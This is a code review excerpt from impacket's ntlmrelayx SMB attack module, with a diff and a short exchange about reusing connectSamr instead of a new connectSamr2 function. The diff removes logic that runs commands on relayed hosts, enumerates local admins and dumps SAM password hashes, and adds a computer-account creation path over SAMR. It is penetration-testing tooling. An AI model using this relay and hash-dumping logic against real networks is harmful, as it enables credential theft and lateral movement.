impacket/examples/ntlmrelayx/attacks/smbattack.py

```diff
@@ -65,55 +68,125 @@ def run(self):
-                        enumLocalAdmins = EnumLocalAdmins(self.__SMBConnection)
-                        try:
-                            localAdminSids, localAdminNames = enumLocalAdmins.getLocalAdmins()
-                            LOG.info("Host {} has the following local admins (hint: try relaying one of them here...)".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding)))
-                            for name in localAdminNames:
-                                LOG.info("Host {} local admin member: {} ".format(self.__SMBConnection.getRemoteHost().encode(self.config.encoding), name))
-                        except DCERPCException:
-                            LOG.info("SAMR access denied")
-                        return
-                # Something else went wrong. aborting
-                LOG.error(str(e))
-                return
+            if (self.config.addComputerSMB is not None):
+                from impacket.examples.secretsdump import RemoteOperations
+                try:
+                    # We have to add some flags just in case the original client did not
+                    # Why? needed for avoiding INVALID_PARAMETER
+                    if  self.__SMBConnection.getDialect() == smb.SMB_DIALECT:
+                        flags1, flags2 = self.__SMBConnection.getSMBServer().get_flags()
+                        flags2 |= smb.SMB.FLAGS2_LONG_NAMES
+                        self.__SMBConnection.getSMBServer().set_flags(flags2=flags2)
 
-            try:
-                if self.config.command is not None:
-                    remoteOps._RemoteOperations__executeRemote(self.config.command)
-                    LOG.info("Executed specified command on host: %s", self.__SMBConnection.getRemoteHost())
-                    self.__SMBConnection.getFile('ADMIN$', 'Temp\\__output', self.__answer)
-                    self.__SMBConnection.deleteFile('ADMIN$', 'Temp\\__output')
-                    print(self.__answerTMP.decode(self.config.encoding, 'replace'))
-                else:
-                    bootKey = remoteOps.getBootKey()
-                    remoteOps._RemoteOperations__serviceDeleted = True
-                    samFileName = remoteOps.saveSAM()
-                    samHashes = SAMHashes(samFileName, bootKey, isRemote = True)
-                    samHashes.dump()
-                    samHashes.export(self.__SMBConnection.getRemoteHost()+'_samhashes')
-                    LOG.info("Done dumping SAM hashes for host: %s", self.__SMBConnection.getRemoteHost())
-            except Exception as e:
-                LOG.error(str(e))
-            finally:
-                if samHashes is not None:
-                    samHashes.finish()
-                if remoteOps is not None:
-                    remoteOps.finish()
+                    remoteOps  = RemoteOperations(self.__SMBConnection, False)
+                    remoteOps.connectSamr2(self.__SMBConnection.getRemoteHost())
```

Comment:
We don't need to create a new function, we can use the original `connectSamr` function as follow:
```suggestion
                    remoteOps.connectSamr(remoteOps.getMachineNameAndDomain()[1])
```

Or is there something I'm missing?

Reply:
Now, I have also remove the `connectSamr2` function from secretsdump.py, since it is no more used.